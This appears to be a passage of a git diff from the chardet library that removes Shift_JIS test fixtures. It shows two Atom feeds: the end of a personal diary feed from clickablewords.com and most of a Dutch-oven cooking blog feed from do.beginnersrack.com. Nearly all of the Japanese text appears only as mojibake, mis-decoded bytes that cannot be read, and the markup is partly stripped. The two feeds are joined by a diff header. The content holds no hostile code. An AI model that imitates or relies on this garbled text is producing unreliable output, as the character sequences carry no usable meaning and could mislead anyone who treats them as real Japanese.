    - -כ¯‚¾ - -2005-09-08T00:12:39Z -2005-09-08T00:11:25Z -tag:clickablewords.com,2005://6.334 -2005-09-08T00:11:25Z -–°‚¢‚ּ‚ֹ‘_‚ם‚ך‚ִ‚¢‚יB‹C‚נ‚‚¢‚½‚ח‚ג‚ח‚ך‚י[B‚µ‚©‚µ‰¼–°‚µ‚ָ‚¢‚ֶ¶‚«‚ִ‚¢‚¯‚ָ‚¢B... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -–°‚¢‚ּ‚ֹ‘_‚ם‚ך‚ִ‚¢‚יB‹C‚נ‚‚¢‚½‚ח‚ג‚ח‚ך‚י[B‚µ‚©‚µ‰¼–°‚µ‚ָ‚¢‚ֶ¶‚«‚ִ‚¢‚¯‚ָ‚¢B‚¨‚ג‚·‚‚ָ‚³‚¢B

    ]]> - -
    -
    - -‚‚ס‚«‚ֲ[ - -2005-09-04T19:00:24Z -2005-09-04T18:56:28Z -tag:clickablewords.com,2005://6.333 -2005-09-04T18:56:28Z -‹א—j“תA–‰ז‹i’ƒ‚ײs‚ֱ‚ִ—ˆ‚½B ’´I ‹vXI ‚ֶA´‚¶‚י‚ּ‚ֽA‚¸‚ֱ‚ֶs‚«‚½‚­‚ִ‚½... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‹א—j“תA–‰ז‹i’ƒ‚ײs‚ֱ‚ִ—ˆ‚½B
    -’´I ‹vXI
    -‚ֶA´‚¶‚י‚ּ‚ֽA‚¸‚ֱ‚ֶs‚«‚½‚­‚ִ‚½‚‚ח‚ָ‚©‚ֱ‚½‚©‚ח‚¾‚כ‚₪B
    -8”¼‚־‚ֹ•א‚¢‚ִ‚¢‚¯‚י‹——£‚ֹ–‰ז‹i’ƒ‚ֵׂ‚«‚½‚ּ‚¾B8‰{‚ֹAOPEN—\’ט‚ּƒ`ƒ‰ƒV‚׃|ƒXƒeƒBƒ“ƒO‚³‚ך‚ִ‚¢‚ִA‚»‚ּ‚ֶ‚«‚©‚חs‚­‚¼s‚­‚¼‚ֶv‚ֱ‚ִ‚¢‚ִA‚ז‚₪‚ג‚­A‚ז‚₪‚ג‚­A‚ֶ‚¢‚₪‚ם‚¯‚¾B

    - -

    –י‚²‚ֽ‚ס‚ֶ’©‚²‚ֽ‚ס‚נ‚»‚±‚ֵH‚׳‚½B‚¸[‚ֱ‚ֶ–‰ז‚נ“ַ‚ס‚ֵ‚¢‚½B‚ָ‚ס‚ֶ‚¢‚׃ƒXƒgƒƒX‰נֱI
    -‚ם‚½‚µ‚ֽ•¨ך‚×D‚«‚¾Bd–‚ּ‡װ‚ֹA¬א“ַ‚ס‚¾‚טA״‚ט‚ִ‚«‚½DVD©‚½‚טAƒlƒbƒg‚ֵ״‘ƒhƒ‰ƒ}©‚½‚ט‚ֽ‚µ‚ִ‚¢‚½‚¯‚ך‚ַAƒYƒh[ƒ“‚ֶ•¨ך‚¾‚¯‚ֹ‚ֽ‚‚ֱ‚ִ‚¢‚ח‚ך‚י–‰ז‹i’ƒ‚ֽ‚ג‚ֽ‚ט‹Md‚¾‚ֶv‚₪B

    - -

    V‚µ‚­‚ֵ‚«‚½‚»‚ּ–‰ז‹i’ƒ‚ֽAדY—ם‚ֵAֲ÷‚אLX‚ֶ‚µ‚ִ‚¢‚½BƒXƒ^ƒbƒt‚ֽ‚‚¾•sµ‚ך‚ֵAƒt[ƒhƒƒjƒ…[‚א‚‚¾‚‚¾­‚ָ‚­‚ִ‹ֱ‚¢‚½‚×A–‰ז‚ּ•i‘µ‚¦‚ֽ—ַ‚¢‚µAVh‚גa’J‚ּ‹·‚³E‰˜‚³‚נv‚¦‚־“V‘‚¾B

    - -

    ƒiƒCƒgƒpƒbƒNA5װ‚ֵ1200‰~‚¾‚ֱ‚½‚ֱ‚¯Bƒtƒ[ƒhƒƒ“ƒN‚¾‚µAˆְ‚¢‚ֵ‚µ‚ו‚₪B
    -¡‚©‚ח‚ֵ‚אs‚«‚½‚¢‚¯‚ַAd–‚¾‚©‚ח‰ה–B©•ׂײ‚ּ‚²–J”‚ֶ‚µ‚ִ’ט‚µ‚ִ‚¨‚±‚₪‚ֶv‚₪B

    ]]> - -
    -
    - -•xmR‚ֹ - -2005-08-19T05:59:56Z -2005-08-19T05:58:32Z -tag:clickablewords.com,2005://6.332 -2005-08-19T05:58:32Z -‚ּ‚‚ֱ‚ִ‚«‚‚µ‚½I‚»‚µ‚ִ¡‰·ע‚ֵ¾—¬‚µ‚½‚ֶ‚±‚ֵ‚·B‹A‚י‚ּ–“|‚ֵ‚·B... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚ּ‚‚ֱ‚ִ‚«‚‚µ‚½I‚»‚µ‚ִ¡‰·ע‚ֵ¾—¬‚µ‚½‚ֶ‚±‚ֵ‚·B‹A‚י‚ּ–“|‚ֵ‚·B

    ]]> - -
    -
    - -–י‚ּC - -2005-08-11T14:52:06Z -2005-08-11T14:50:00Z -tag:clickablewords.com,2005://6.331 -2005-08-11T14:50:00Z -–י‚ּC‚ֽ‚‚ֱ‚­‚ח‚ֵ€‘ּ‚ֵ‚א•‚‚¢‚ִ‚«‚»‚₪‚ֵ‚·B ‚׀‚ֶ‚ט‚ֵC‚ֵˆש‚‚ָ‚¢ƒr[ƒ‹‚נˆש‚ס... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -–י‚ּC‚ֽ‚‚ֱ‚­‚ח‚ֵ€‘ּ‚ֵ‚א•‚‚¢‚ִ‚«‚»‚₪‚ֵ‚·B -‚׀‚ֶ‚ט‚ֵC‚ֵˆש‚‚ָ‚¢ƒr[ƒ‹‚נˆש‚ס‚ֵ‚¢‚יB¯‚ׂ¢‚ֱ‚ֿ‚¢‚ ‚ֱ‚ִ‹C‚¿‚×—ַ‚¢‚ֻB -­™“‡‚ֽwh‚ֹ—ˆ‚ִ‚¢‚‚·BƒoƒXƒgƒCƒ‚ּ‚ָ‚¢•”‰®‚ֹ”‘‚‚ֱ‚ִ‚¢‚‚·B -‚₪‚ֱ‚©‚טQ‰‚²‚µ‚ִ‰·ע‚אH“°‚א‚µ‚‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B -–¾“ת‚ֽ»‚‚µ‰·ע‚ֹ“‚ֱ‚ִF–{‚ְּ‰ֶ‚ֹ‹A‚ט‚‚·B‰ִ‚¾‚¨–~‚¾B‚¿‚ׁ‚ֱ‚ֶ‚¢‚‚µ‚½BC‚ֶׂ‚ִ‚א‹‚¢‚ֶ‚±‚ֹ‚ ‚ט‚‚·B - -

    ]]> - -
    -
    - -ƒzƒƒCƒhƒoƒ“ƒh - -2005-08-04T02:57:10Z -2005-08-04T02:51:05Z -tag:clickablewords.com,2005://6.330 -2005-08-04T02:51:05Z -‚ָ‚ט‚ׂ­‚ך‚½ƒzƒƒCƒgƒoƒ“ƒhB ‚ָ‚÷‚©‰p‘»B ‚א‚¿‚כ‚סA“n‰p‚µ‚ִ”ƒ‚ֱ‚½‚ם‚¯‚ֵ‚ֽ... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‚ָ‚ט‚ׂ­‚ך‚½ƒzƒƒCƒgƒoƒ“ƒhB
    -‚ָ‚÷‚©‰p‘»B
    -‚א‚¿‚כ‚סA“n‰p‚µ‚ִ”ƒ‚ֱ‚½‚ם‚¯‚ֵ‚ֽ‚ָ‚¢Bƒlƒbƒg‚ֱ‚ִ•ײ—˜‚¾‚ֻI
    -ƒzƒƒCƒgƒoƒ“ƒh‚ֽ‚¿‚ו‚ֱ‚ֶ—~‚µ‚©‚ֱ‚½‚ּ‚ֵAנ‚µ‚©‚ֱ‚½B¡“ת‚ֽ‚ֲ‚¯‚ִOo‚¾B

    - -

    ‚µ‚©‚µ‚ָ‚ט‚³‚סAO‘‚ֹs‚ֱ‚½‚ֶ‚«A‰pך‚¾‚‚¾‚‚¾‚ֱ‚½‚ּ‚ֹA’”ּ‚ֽ‚ֵ‚«‚י•sv‹c‚ָl‚¾B

    ]]> - -
    -
    - -¡“ת‚ּƒ‰ƒ“ƒ` - -2005-08-02T05:49:31Z -2005-08-02T05:18:54Z -tag:clickablewords.com,2005://6.329 -2005-08-02T05:18:54Z -‰ִ‚¾I ‰ִ‚ֶ‚¢‚¦‚־ƒXƒCƒJ‚ֵ‚ ‚יBƒXƒCƒJH‚׳‚·‚¬‚י‚ֶ‚·‚®‚ֹ‚¨• ‚נ‰ף‚·B... - -takako -http://clickablewords.com/ -takako@clickablewords.com - -diary - -‰ִ‚¾I
    -‰ִ‚ֶ‚¢‚¦‚־ƒXƒCƒJ‚ֵ‚ ‚יBƒXƒCƒJH‚׳‚·‚¬‚י‚ֶ‚·‚®‚ֹ‚¨• ‚נ‰ף‚·B

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/do.beginnersrack.com.xml b/chardet/tests/SHIFT_JIS/do.beginnersrack.com.xml deleted file mode 100644 index 1fe5f3c..0000000 --- a/chardet/tests/SHIFT_JIS/do.beginnersrack.com.xml +++ /dev/null @@ -1,874 +0,0 @@ - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵל‚יƒeƒLƒgƒE—¿—ƒƒVƒsW - - - tag:do.beginnersrack.com,2005://1 - - 2005-10-23T00:27:04Z - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ–£—ֽ‚ֶAָ’P‚ֵ‚¨‚¢‚µ‚­‚ֵ‚«‚י—¿—ƒƒVƒs‚נAƒeƒLƒgƒE‚ֹ”­M‚µ‚ִ‚‚·B@ƒAƒEƒgƒhƒA‚ֵƒo[ƒxƒLƒ…[‚א‚¢‚¢‚¯‚ַAƒ_ƒbƒWƒI[ƒuƒ“‚ּ¢E‚א‚ּ‚¼‚¢‚ִ‚‚‚¹‚ס‚©H@ ‚א‚¿‚כ‚סAƒLƒbƒ`ƒ“‚ֵ‚אg‚¦‚‚·B - Movable Type 3.2-ja-2 - - - »ƒTƒCƒg‚ּƒƒjƒ…[ƒAƒ‹’† - - - tag:do.beginnersrack.com,2005://1.3 - - 2005-10-23T00:08:00Z - 2005-10-23T00:27:04Z - - ַ—l‚ּ‚ֶ‚ס‚ֵ‚א‚ָ‚¢ƒ~ƒX‚ֹ‚ז‚טAuƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵל‚יƒeƒLƒgƒE—¿—ƒƒVƒsWv‚׃T... - - beginner - - - - - ַ—l‚ּ‚ֶ‚ס‚ֵ‚א‚ָ‚¢ƒ~ƒX‚ֹ‚ז‚טAuƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵל‚יƒeƒLƒgƒE—¿—ƒƒVƒsWv‚׃TƒCƒg‚²‚ֶ‚ֱ”ע‚ס‚ֵ‚µ‚‚¢‚‚µ‚½B -‚²–ְ˜f‚נ‚¨‚©‚¯‚µ‚‚·‚×A®‘SC•‚‚ֵ©ח‚ט‚­‚¾‚³‚¢B -‚¹‚ֱ‚©‚­‚ֵ‚·‚©‚חA‚±‚ּAV‘•J“X‚‚´‚µA‚²‚ֶƒTƒCƒg‚נƒƒjƒ…[ƒAƒ‹‚¢‚½‚µ‚‚·B -‚µ‚־‚ח‚­©‹ך‚µ‚¢ƒTƒCƒg‚ֹ‚ָ‚ט‚‚·‚×A‚ַ‚₪‚¼‚²¨•‚נBB -@ -y10/23z’ַ‹L -ƒƒjƒ…[ƒAƒ‹‚ׂ‚®—¹‚µ‚‚µ‚½B - ‚ג‚ֱ‚ֶƒTƒCƒg‚ּƒƒjƒ…[ƒAƒ‹‚×®—¹‚¢‚½‚µ‚‚µ‚½B -l‹CƒuƒƒOƒ‰ƒ“ƒLƒ“ƒO‚אAƒ[ƒ‚©‚ח‚ּƒXƒ^[ƒg‚ֵ‚·B -@ -¡ד‚אAF—l‚ּ‰‰‡‚נA‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B -@ -@ -@@ -¡‚¨˜l‚ׁ -‚¢‚‚‚ֵ‚¢‚½‚¾‚¢‚½ƒgƒ‰ƒbƒNƒoƒbƒN‚גƒRƒƒ“ƒg‚ֽA‚·‚׳‚ִ‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B -‚²‚‚ס‚ָ‚³‚¢iƒyƒRƒjB - - - - - ’Y‰־‚ּדn–– - - - tag:do.beginnersrack.com,2005://1.39 - - 2005-08-11T16:57:01Z - 2005-10-13T16:59:23Z - - ƒ_ƒbƒ`ƒI[ƒuƒ“—¿—‚גƒo[ƒxƒLƒ…[‚ֵy‚µ‚ס‚¾דA’Y‚ֽ‚ַ‚₪‚µ‚ִ‚‚·‚©H ‚‚³‚©A‚»‚ּ... - - beginner - - - - - - - - -]]> - - - -‚‚¾”M‚¢’Y‚נA‚׀‚ו‚¢‚׀‚ו‚¢‚±‚ָּˆױ’Y‚ֲ‚‚ּ’†‚ֹ“‚ך‚‚·B -‚»‚µ‚ִA‚·‚®W‚נ‚µ‚‚·B - - -‚±‚₪‚·‚י‚±‚ֶ‚ֵA‹ף‹C‚ָׂ‚­‚ָ‚י‚½‚A’†‚ּ’Y‚ֽA®‘S‚ֱֹ‰»‚µ‚‚·B -‚ֵ‚אA‚ֶ‚ִ‚א”M‚¢‚ּ‚ֵA‚µ‚־‚ח‚­‚»‚ּ‚‚‚ֹ‚µ‚‚µ‚ו‚₪B - - -‚±‚ּ’Y‚ֲ‚A®‘S‚ֹ‚³‚‚ִ‚©‚ח•׀•t‚¯‚‚·B -‚»‚µ‚ִA‰ס‚ּƒAƒEƒgƒhƒA—¿—‚ֹA‚±‚ּ‚ּ‚ָ‚©‚ּ’Y‚נ‚µ‚¢‚ִAg‚¢‚‚µ‚ו‚₪B -®‘S‚ֹ£‘‡‚µ‚ִ‚¢‚י‚ּ‚ֵA‰־‚ֲׂ‚«‚ג‚·‚¢‚ּ‚ֵ‚·B -‚³‚ח‚ֹA’Y‚נ–³‘‚ֹ‚µ‚‚¹‚סB -ˆך־“ס’¹‚ֵ‚ ‚ט‚‚·B - -]]> - - - - ‰־‚¨‚±‚µƒLƒXƒP‚Q†Ri‚׀‚¨‚±‚µ‚«‚·‚¯‚ֹ‚²‚₪ƒƒ^[ƒ“ƒYj - - - tag:do.beginnersrack.com,2005://1.38 - - 2005-07-16T16:51:54Z - 2005-10-13T16:56:39Z - - ‚ ‚ּAu‰־‚¨‚±‚µƒLƒXƒP‚Q†v‚×Aƒpƒ[ƒAƒbƒv‚µ‚‚µ‚½B... - - beginner - - - - - - ‚ ‚ּAu‰־‚¨‚±‚µƒLƒXƒP‚Q†v‚×Aƒpƒ[ƒAƒbƒv‚µ‚‚µ‚½B - - - - - - -‚±‚ך‚ֽA‰־‚¨‚±‚µƒLƒXƒP‚Q†‚ּƒpƒ[ƒAƒbƒvEƒAƒCƒeƒ€‚ֹ‚ָ‚ט‚‚µ‚ו‚₪B - - -ƒLƒXƒP‚ֹƒXƒR‚ֱ‚ֶ‚ֽ‚‚ִ‚‚½B -“ֱ‘וƒ|ƒ“ƒv - -®ארI - - -”[‚ֹ‚א‚©‚³‚־‚ט‚‚¹‚סB -“ֱ‘וƒ|ƒ“ƒv -@ -@ -@ - -¡‚±‚ך‚×AVu‰־‚¨‚±‚µƒLƒXƒP‚Q†v‚ּˆ׀—ֽ‚¾I -‰־‚¨‚±‚µƒLƒXƒP‚Q†R‚ּˆ׀—ֽ - - -@×@ - -ƒNƒƒbƒN‚·‚י‚ֶA“®‰ז‚ֵƒLƒXƒP‚ּˆ׀—ֽ‚נ©‚י‚±‚ֶ‚×o—ˆ‚‚·B -‘S‘‚ּƒAƒEƒgƒhƒA”h‚ּF‚³‚סAƒLƒXƒP‚נ‚¨‹‚ֹƒo[ƒxƒLƒ…[‚ֽ‚¢‚©‚ֵׂ‚·‚©I - -]]> - - - - ƒV[ƒt[ƒhEƒsƒ‰ƒt - - - tag:do.beginnersrack.com,2005://1.37 - - 2005-07-16T16:48:16Z - 2005-10-13T16:51:33Z - - ƒfƒC¥ƒLƒƒƒ“ƒv‚ֵAל´‚ֵƒo[ƒxƒLƒ…[‚נ‚µ‚‚µ‚½B ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵAƒV[ƒt[ƒhE... - - beginner - - - - - - - ƒfƒC¥ƒLƒƒƒ“ƒv‚ֵAל´‚ֵƒo[ƒxƒLƒ…[‚נ‚µ‚‚µ‚½B -ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵAƒV[ƒt[ƒhEƒsƒ‰ƒt‚נל‚ט‚‚µ‚½B - - - - - - -04D‚¨•ִ‚ד§‚«’‚טn‚‚½‚חA…‚נ‚¢‚ך‚יB -…‚ּ—‚ֽA‚¨•ִ‚ּƒJƒbƒv”@ƒvƒ‰ƒX@‚»‚ּ1„’צ“xB - - -05DƒRƒ“ƒ\ƒ‚ּ‚א‚ֶ‚נ׃‚«‚¢‚ךA‚³‚ח‚ֹ‰–‚נƒeƒLƒgƒE‚ֹ‰ֱ‚¦A—ג“€ƒV[ƒt[ƒhEƒ~ƒbƒNƒX‚נ““B -ƒV[ƒt[ƒhEƒ~ƒbƒNƒX‚ֽ‚¨•ִ‚ּד‚ֹ•ְ‚׳‚י´‚¶B -ƒV[ƒt[ƒh¥ƒsƒ‰ƒt - - -06D–ס‚Q‚O•ׂ©‚¯‚ִ†‚«ד‚°‚יB‰־‚©‚ח‚¨‚כ‚µ‚ִ‚P‚O•×צ‚ח‚µ‚ִA®¬B -ƒV[ƒt[ƒh¥ƒsƒ‰ƒt -@ -@ - -¡†‚«ד‚°‚יװE‰־—ֽ‚ּƒRƒc - -‚¨‚¨‚ז‚»‚Q‚O•ּׂ†‚«ד‚°‚ֽA’†‰־‚©‚ח‹­‰־‚ּװ‚ּ‰־‚©‚°‚ס‚ֵB -ƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ”M“`“±‚ּ‚ז‚³‚ּ‚¨‚©‚°‚ֵA‚¿‚ו‚ֱ‚ֶד‚¢H‚®‚ח‚¢‚ֵ\•ֵׂ‚·B - -צ‚ח‚µ‚ֹ‚ֽ‚¢‚י’¼‘O‚ֵA‰־‚נ‹­‚‚ֹ‚µ‚ִA‚ם‚´‚ֵֶ‚°–‚נ‚ֲ‚¯‚י‚ּ‚א‚¢‚¢B - -W‚נ‚ֶ‚ֱ‚ִm‚©‚‚י‚ּ‚א‚¢‚¢‚¯‚ַA‚ ‚‚ט‚ג‚ט‚·‚¬‚י‚ֶ‚¨•ִ‚ּ•\–‚×ֵ‚­‚ָ‚ֱ‚½‚טA‚²”ׁ‚ֹc‚ּׂ‚±‚י‚±‚ֶ‚ׂ ‚י‚ּ‚ֵ’ˆ׃B -@ -@ -@ -¡‚׀‚ֶ‚±‚ֶB - -‚µ‚־‚ח‚­‰־‚©‚ח‰÷‚כ‚µ‚ִ‚אAƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ•×ת‚¢“חת‚ּ‚¨‚©‚°‚ֵA‚ָ‚©‚ָ‚©‚²”ׁ‚×—ג‚‚‚¹‚סB -ƒV[ƒt[ƒh‚נ“‚ך‚י‚ֶ‚«‚ֹAƒgƒ}ƒg‚נ‚‚י‚²‚ֶ”ֲ“‚ך‚ִ‚אA‚¨‚¢‚µ‚¢‚©‚אB -‚»‚µ‚½‚ח•‚ּ—¿—‚ֹ‚ָ‚ֱ‚¿‚ב‚₪‚©B - - -]]> - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ‘I‚ׁ• - - - tag:do.beginnersrack.com,2005://1.36 - - 2005-07-12T16:46:54Z - 2005-10-23T18:26:18Z - - ‰‚‚ִƒ_ƒbƒ`ƒI[ƒuƒ“‚נw“‚·‚י‚ֶ‚«‚ֹA‚ַ‚ס‚ָמ€‚ֵ‘I‚׳‚־‚ז‚¢‚ּ‚ֵ‚µ‚ו‚₪‚©H ‚‚¸... - - beginner - - - - - - ‰‚‚ִƒ_ƒbƒ`ƒI[ƒuƒ“‚נw“‚·‚י‚ֶ‚«‚ֹA‚ַ‚ס‚ָמ€‚ֵ‘I‚׳‚־‚ז‚¢‚ּ‚ֵ‚µ‚ו‚₪‚©H - -‚‚¸A–“I‚נ‚ֽ‚ֱ‚«‚ט‚³‚¹‚‚µ‚ו‚₪B - - - - ¡ƒLƒbƒ`ƒ“‚ֵg‚¢‚½‚¢ -@ƒIƒXƒXƒ‚ֽAƒLƒbƒ`ƒ“Eƒ_ƒbƒ`ƒI[ƒuƒ“AƒRƒ“ƒ{EƒNƒbƒJ[AƒXƒLƒƒbƒgAƒT[ƒrƒ“ƒOEƒ|ƒbƒgB -@ƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“‚א‚¢‚¢‚¯‚ַAO–{‹r‚ׂ¿‚ו‚ֱ‚ֶ׳–‚‚ֹ‚ָ‚י‚©‚אB - -¡ƒAƒEƒgƒhƒA‚ֵƒKƒ“ƒKƒ“g‚¢‚½‚¢ -@ƒIƒXƒXƒ‚ֽAƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“ -@W‚ֹƒtƒƒ“ƒW‚ׂ ‚טA’Y‚נ‚ּ‚¹‚ִד‚©‚ח”M‚·‚י‚±‚ֶ‚ֵׂ‚«‚‚·B - -¡ƒLƒbƒ`ƒ“‚ֵ‚אAƒAƒEƒgƒhƒA‚ֵ‚אA‚ַ‚¿‚ח‚ֵ‚אg‚¢‚½‚¢ -@ƒRƒ“ƒ{EƒNƒbƒJ[AƒXƒLƒƒbƒg‚×A–”\‘IטB -@ƒLƒbƒ`ƒ“Eƒ_ƒbƒ`ƒI[ƒuƒ“‚¾‚ֱ‚ִAƒLƒbƒ`ƒ“‚נ”ע‚ׁo‚µ‚ִg‚₪‚±‚ֶ‚אA‚א‚ס‚¾‚¢‚ָ‚µB - - -¡‚ ‚ֶA–Y‚ך‚ִ‚ֽ‚¢‚¯‚ָ‚¢‚ּ‚×AuƒV[ƒYƒjƒ“ƒOiµ‚ח‚µjv -ƒƒbƒW׀»‚ּƒ_ƒbƒ`ƒI[ƒuƒ“‚ֹ‚ֽAuƒV[ƒYƒjƒ“ƒO•s—vv‚ּuƒƒbƒWEƒƒWƒbƒNEƒVƒ[ƒYv‚ּƒ‰ƒCƒ“ƒAƒbƒv‚ׂ ‚ט‚‚·B -‚±‚ך‚ֽA–“|‚ָƒV[ƒYƒjƒ“ƒO‚נ‚·‚י•K—v‚א‚ָ‚­A”ƒ‚ֱ‚½‚»‚ּ“ת‚©‚חש‚ֹ^‚ֱ•iƒuƒ‰ƒbƒNƒ|ƒbƒgj‚ֹ‚ָ‚ֱ‚½‚¢‚‚·B‚¨“’‚ֵפ‚₪‚¾‚¯‚ֵA‚·‚®g‚₪‚±‚ֶ‚×o—ˆ‚‚·B -‚±‚¿‚ח‚ּuƒƒWƒbƒNEƒVƒ[ƒYv‚אƒIƒXƒXƒ‚ֵ‚·B - -‚ֵ‚אAƒ_ƒbƒ`ƒI[ƒuƒ“‚נ^‚ֱ•‚ֹ‚·‚י‚±‚ֶ‚ֹ–½‚נ”R‚ג‚·ƒRƒA‚ָƒtƒ@ƒ“‚ֹ‚ֶ‚ֱ‚ִ‚ֽAuƒƒWƒbƒN‚ֽ׳“¹‚¾Iv‚ָ‚ס‚ִ‚¢‚ם‚ך‚י‚©‚א‚µ‚ך‚‚¹‚ס‚ֻi־jB - - - - - - - - g‚ֱ‚½ד‚ּט“‚ך - - - tag:do.beginnersrack.com,2005://1.35 - - 2005-06-04T16:43:57Z - 2005-10-13T16:45:36Z - - ”–¡‚µ‚¢—¿—‚נy‚µ‚ס‚¾‚ ‚ֶAƒ_ƒbƒ`ƒI[ƒuƒ“‚א‚«‚ך‚¢‚ֹפ‚ֱ‚ִ‚ ‚°‚‚µ‚ו‚₪B -ƒuƒ‰ƒbƒNƒ|ƒbƒg -‹א‘®»‚ּ‚½‚ם‚µ‚ֽAµ‹ײ - - beginner - - - - - - ”–¡‚µ‚¢—¿—‚נy‚µ‚ס‚¾‚ ‚ֶAƒ_ƒbƒ`ƒI[ƒuƒ“‚א‚«‚ך‚¢‚ֹפ‚ֱ‚ִ‚ ‚°‚‚µ‚ו‚₪B - -פ‚ֽµ‹ײ‚ֵ‚·B - - - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽA–‚נ‚ז‚­‚ָ‚¶‚‚¹‚ִ‚¨‚­‚±‚ֶ‚×AדX‚ּ”–¡‚µ‚¢—¿—‚ּ‚½‚‚ֹA•K—v‚ָ‚ּ‚ֵ‚·B -‚¾‚©‚חA‚¹‚ֱ‚©‚­–‚‚‚ך‚ֹ‚ָ‚ֱ‚½ƒ_ƒbƒ`ƒI[ƒuƒ“‚נAפ‚נg‚ֱ‚ִ‘ו״‚ָ–ƒR[ƒeƒBƒ“ƒO‚נ—¬‚µ‚ִ‚µ‚‚ֱ‚ִ‚ֽA‚¢‚ֲ‚‚ֵ‚½‚ֱ‚ִ‚אuƒuƒ‰ƒbƒNƒ|ƒbƒgv‚ֹ‚ֽ‚ָ‚ך‚‚¹‚סB - - -¡—¿—‚נH‚׳‚½‚ ‚ֶ - -‚»‚ּ‚‚‚ ‚‚ֱ‚½—¿—‚נƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ’†‚ֹ“‚ך‚ֱ‚ֿ‚ָ‚µ‚ֵAˆך”׃’u‚¢‚ִ‚µ‚‚₪A‚ָ‚ס‚ִ‚±‚ֶ‚ּ‚ָ‚¢‚ז‚₪‚ֹ‚µ‚‚µ‚ו‚₪B - -ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽu“Sv‚ֵ‚·‚©‚חA‚‚₪‚ֱ‚ִ‚¨‚¢‚½‚חK‚ֵׂ‚ִ‚«‚‚·B -‚»‚₪‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚חAד‚ֵH‚׳‚ז‚₪‚ֶv‚ֱ‚ִ‚ֶ‚ֱ‚ִ‚¨‚¢‚½—¿—‚אAH‚׳‚ח‚ך‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚·B - -H‚׳I‚ם‚ֱ‚½‚חA‚ ‚‚ֱ‚½—¿—‚ֽ‚·‚®•‚ּ—eם‚ֹˆ‚µ‚‚µ‚ו‚₪B - -‚»‚µ‚ִA‚¨“’‚נ’£‚ֱ‚ִ‚¨‚«‚‚µ‚ו‚₪B - - -¡פ‚¢• - -‚±‚ׁ‚ט‚ֲ‚«‚ׂ׀‚ַ‚¯‚ך‚־A‚µ‚־‚ח‚­‚¨“’‚ֹ‚ֲ‚¯‚ִ‚¨‚«‚‚·B -‚»‚ך‚‚ַ‚׀‚ַ‚­‚ָ‚¯‚ך‚־A‚½‚ם‚µ‚ֵפ‚¢‚‚·B - -‹א‘®»‚ּ‚½‚ם‚µ‚ֽAµ‹ײ‚ֵ‚·B - -‘“–ƒKƒ“ƒR‚ָ‰˜‚ך‚ֹ‚ֽAd‘‚‚נg‚¢‚‚µ‚ו‚₪B -–לO—¿—‚ֵפ‚¢•¨‚נ‚·‚י‚ֶ‚«Aפ‚ֵ‚ֽ‚ָ‚­d‘‚‚נg‚₪‚±‚ֶ‚ֽAƒGƒRƒƒW‚ֵ‚א‚ ‚ט‚‚·B - - -¡פ‚ֱ‚½‚ ‚ֶ - -…‚נ״‚ֱ‚ִA£‘‡‚³‚¹‚‚·B -y‚­‰־‚ֹ‚©‚¯‚ִ£‘‡‚נ‘¬‚‚ִ‚א‚¢‚¢‚ֵ‚·B - - -¡–‚נ“h‚ט‚±‚ - -ƒLƒbƒ`ƒ“ƒy[ƒp[‚ָ‚ַ‚ֵA–‚נ”–‚­“h‚ט‚‚·B - -“ח–{‘ּ‚ּ“א‘₪‚¾‚¯‚ֵ‚ָ‚­AO‘₪‚ֹ‚אAW‚ׂ ‚ך‚־‚»‚ּ— •\‚ֹ‚אA“h‚ֱ‚ִ‚¨‚«‚‚·B - - -¡•ַ•–@ - -•p”ֹ‚ֹg‚₪‚ּ‚ֵ‚ ‚ך‚־A“ֱ‚ֹ’ˆ׃‚·‚י“_‚ֽ‚ ‚ט‚‚¹‚סB -‚µ‚־‚ח‚­g‚ם‚ָ‚¢ך‡A’†‚ֹV•·†‚נ‚‚ִ‚¢‚ך‚ִAW‚ֶ“ח‚ּװ‚ׂ·‚±‚µJ‚­‚ז‚₪‚ֹA„‚ט”¢‚ָ‚ַ‚נ‚ֽ‚³‚ס‚ֵ‚¨‚«‚‚µ‚ו‚₪B - -’‹C«‚נm•‚·‚י‚½‚‚ֵ‚·B - - -‚»‚µ‚ִAƒ_ƒbƒ`ƒI[ƒuƒ“‚נ”ƒ‚ֱ‚½‚ֶ‚«‚ֹ«•ן‚µ‚ִ‚ ‚ֱ‚½” iּ‚ִ‚¿‚בƒ_ƒ‚ֵ‚·‚זj‚נ—˜—p‚µ‚ִA•ַ‚µ‚‚µ‚ו‚₪B - - -¡”װO•ׂF‚ַ‚₪‚µ‚ז‚₪‚א‚ָ‚¢’צ‚ֹA‰˜‚ך‚ׂ±‚ׁ‚ט‚ֲ‚¢‚ִ‚µ‚‚ֱ‚½‚ח - -d•‚ָ‚¢Bפ‚נg‚¢‚‚µ‚ו‚₪B -‹א‚½‚ם‚µ‚אg‚¢‚‚µ‚ו‚₪B - -•K—v‚ֶ‚ָ‚ך‚־A‚c‚h‚xH‹ן‚ֵ‚ ‚יuƒOƒ‰ƒCƒ“ƒ_[v‚אg‚ֱ‚ִ‚µ‚‚¢‚‚µ‚ו‚₪B - - -‚±‚ך‚ֵAƒuƒ‰ƒbƒNƒ|ƒbƒg‚ײ‚ּ“¹‚ֽAU‚טo‚µ‚ֹ–‚ט‚‚·B - 